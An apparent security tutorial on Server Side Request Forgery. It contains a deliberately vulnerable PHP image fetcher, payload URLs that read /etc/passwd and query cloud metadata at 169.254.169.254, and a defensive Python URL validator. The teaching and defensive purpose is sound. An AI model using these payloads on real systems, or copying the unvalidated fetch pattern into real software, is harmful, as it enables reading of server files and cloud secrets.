Server Side Request Forgery (SSRF)


Server Side Request Forgery, commonly known as SSRF, is a vulnerability where an attacker can make the vulnerable server (web application) issue requests to other servers. Because the request originates from the server, it can bypass firewall rules and let the attacker reach internal servers that are not exposed to the attacker directly.

How it works

It usually happens when the application sends a request and gives the user partial control over it (e.g. part of the URL). An attacker may be able to exploit this to control the whole request and craft malicious requests from the target server to internal and external destinations.

Severity

High

Impact

  1. Scan local or external network
  2. Read files from affected server
  3. Interact with internal systems
  4. Remote code execution

Example

In the following example we have a simple web application which loads and displays images.

Vulnerable code

<?php

# Check if the 'image_url' GET variable is set
if (isset($_GET['image_url'])) {
    $url = $_GET['image_url'];

    # Fetch the image from the user supplied URL
    # (vulnerable: any scheme and any host the server can reach is accepted)
    $file = fopen($url, 'rb');

    # Send proper header for png images
    header("Content-Type: image/png");

    # Dump image file to the response
    fpassthru($file);
    fclose($file);
} else {
    # Notify user if he didn't enter a URL
    echo 'Please enter image url';
}

?>

Let's load Google's logo:

http://localhost/ssrf.php?image_url=https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png

Exploitation

We can read files from the server:

http://localhost/ssrf.php?image_url=file:///etc/passwd

Response

By looking at the page source we will find the contents of the /etc/passwd file in the response body.

Extracting cloud metadata

To extract the hostname from the AWS metadata service we can use:

http://localhost/ssrf.php?image_url=http://169.254.169.254/latest/meta-data/hostname

For DigitalOcean metadata:

http://localhost/ssrf.php?image_url=http://169.254.169.254/metadata/v1.json

Port scanning internal network

By using SSRF you can perform port scanning of the internal network to discover services running on it, which may lead to further exploitation.

Prevention

  1. Disable unused URL schemes like file://, ftp://, gopher://
  2. Internal services have to be protected by authentication to add an extra layer of protection
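As an added example (not part of the original article, and written in Python rather than the page's PHP so it can be run stand-alone), the following validator applies the first prevention item to the image-fetching endpoint above: it allows only http/https, only ports 80 and 443, rejects credentials in the URL, and resolves the host so that loopback, private and link-local addresses such as 169.254.169.254 are refused. The hostnames and addresses in the comments and tests are constructed placeholders; the resolver is injectable so the checks can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}   # no file://, ftp://, gopher://
ALLOWED_PORTS = {80, 443}             # stops the fetcher being used as a port scanner


def resolve_all(host):
    """Default resolver: every A/AAAA address the host maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(addr):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:169.254.169.254 -> 169.254.169.254
    return ip.is_global and not ip.is_multicast


def validate_image_url(url, resolver=resolve_all):
    """Return (ok, reason, addresses).

    To avoid DNS rebinding between check and use, the fetcher must connect
    to one of the returned addresses (with the Host header set) rather than
    resolving the name again, and must not follow redirects unchecked.
    """
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", set()
    if not parts.hostname:
        return False, "missing host", set()
    if parts.username or parts.password:
        return False, "credentials in URL", set()
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:                 # non-numeric or out-of-range port
        return False, "invalid port", set()
    if port not in ALLOWED_PORTS:
        return False, "port not allowed", set()
    try:                               # IP literal: no DNS lookup needed
        addrs = {str(ipaddress.ip_address(parts.hostname))}
    except ValueError:
        try:
            addrs = resolver(parts.hostname)
        except OSError:
            return False, "resolution failed", set()
    if not addrs or any(not is_public_address(a) for a in addrs):
        return False, "resolves to non-public address", set()
    return True, "ok", addrs
```

The second prevention item (authentication on internal services) is a separate control and is not covered by this check.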